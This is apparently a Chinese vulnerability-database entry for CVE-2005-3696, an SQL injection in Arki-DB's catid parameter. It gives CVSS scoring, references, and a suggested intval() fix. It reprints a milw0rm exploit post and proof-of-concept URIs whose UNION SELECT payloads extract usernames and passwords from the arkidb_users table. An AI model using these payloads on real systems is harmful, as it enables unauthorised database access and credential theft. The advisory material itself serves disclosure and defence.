CVE-2005-3696
CVSS7.5
发布时间 :2005-11-20 17:03:00
修订时间 :2011-03-07 21:27:00
NMCOES    

[原文]SQL injection vulnerability in Arki-DB 1.0 and 2.0 allows remote attackers to execute arbitrary SQL commands via the catid parameter in a view action (view.php) to index.php.


[CNNVD]Arki-DB catid变量远程SQL注入漏洞(CNNVD-200511-281)

        Arki-DB是一款基于WEB的PHP编写的文件上传下载管理程序。
        Arki-DB对用户提交给的参数缺少正确充分的过滤,远程攻击者可以利用此漏洞非授权操作数据库。Arki-DB的view.php脚本对用户提交catid参数数据缺少充分过滤,远程攻击者可以通过在输入数据中插入特定的SQL命令来非授权获取对数据库的访问。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:arki-db:arki-db:2.0
cpe:/a:arki-db:arki-db:1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3696
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3696
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-281
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2477
(UNKNOWN)  VUPEN  ADV-2005-2477
http://www.securityfocus.com/bid/15467
(UNKNOWN)  BID  15467
http://secunia.com/advisories/17627
(VENDOR_ADVISORY)  SECUNIA  17627
http://addict3d.org/index.php?page=viewarticle&type=security&ID=5268
(UNKNOWN)  MISC  http://addict3d.org/index.php?page=viewarticle&type=security&ID=5268
http://www.osvdb.org/20944
(UNKNOWN)  OSVDB  20944

- 漏洞信息

Arki-DB catid变量远程SQL注入漏洞
高危 SQL注入
2005-11-20 00:00:00 2005-11-21 00:00:00
远程  
        Arki-DB是一款基于WEB的PHP编写的文件上传下载管理程序。
        Arki-DB对用户提交给的参数缺少正确充分的过滤,远程攻击者可以利用此漏洞非授权操作数据库。Arki-DB的view.php脚本对用户提交catid参数数据缺少充分过滤,远程攻击者可以通过在输入数据中插入特定的SQL命令来非授权获取对数据库的访问。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://sourceforge.net/projects/arkidb/

- 漏洞信息 (1320)

Arki-DB 1.0 (catid) Remote SQL Injection Vulnerabilities (EDBID:1320)
php webapps
2005-11-14 Verified
0 Devil-00
N/A [点击下载]
[~] ArkiDB SQL Injection's [~]
[~] ArkiDB (catid) Ramote SQL Injection's 
[~] ---------------------- [~]
[~] Bug By Devil-00
[~] devil-00@s4a.cc
[~] 
[~] Whe Ar All Love Security4Arab For Ever [ S4a.cc ]
[~] -------------------------------------------------
[~]
[~] Explorer Exploit By  Devil-00
[~] -------------------------------------------------
[~] Greetz :-
[~]   Devil-00
[~]   www.s4a.cc << We Love You
[~]   www.securitygurus.net << Love you 2 :P
[~]   HACKERS PAL - ABDUCTER - Xion - Yes2Hack - Ja7ole - Magode .. All S4a And SG Members
[~]---------------------------------------------------------------------------------------------------------
[~] Explorer Exploit :-
[~]
[~]  [Username]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1    
[~]
[~]  [Password]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]----------------------------------------------------------------------------------------------------------
[~] FIX :-
[~]  Line 75 .. File /source/view.php
[~]  
[~]   $catid = $this->get('catid');
[~] Change To
[~]   $catid = intval($this->get('catid'));
[~]---------------------------------------------------------------------------------------------------------- 

[~] milw0rm.com [2005-11-14]
		

- 漏洞信息

20944
Arki-DB index.php catid SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public, Exploit Unknown

- 漏洞描述

Arki-DB contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'catid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-11-17 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Arki-DB Index.PHP SQL Injection Vulnerability
Input Validation Error 15467
Yes No
2005-11-16 12:00:00 2009-07-12 05:56:00
Devil-00 <devil-00@s4a.cc> is credited with the discovery of this vulnerability.

- 受影响的程序版本

Arki-DB Arki-DB 2.0
Arki-DB Arki-DB 1.0

- 漏洞讨论

Arki-DB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

- 漏洞利用

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/index.php?action=view&amp;view=category&amp;catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&amp;catflag=1&amp;sublevel=1
http://www.example.com/index.php?action=view&amp;view=category&amp;catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&amp;catflag=1&amp;sublevel=1

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站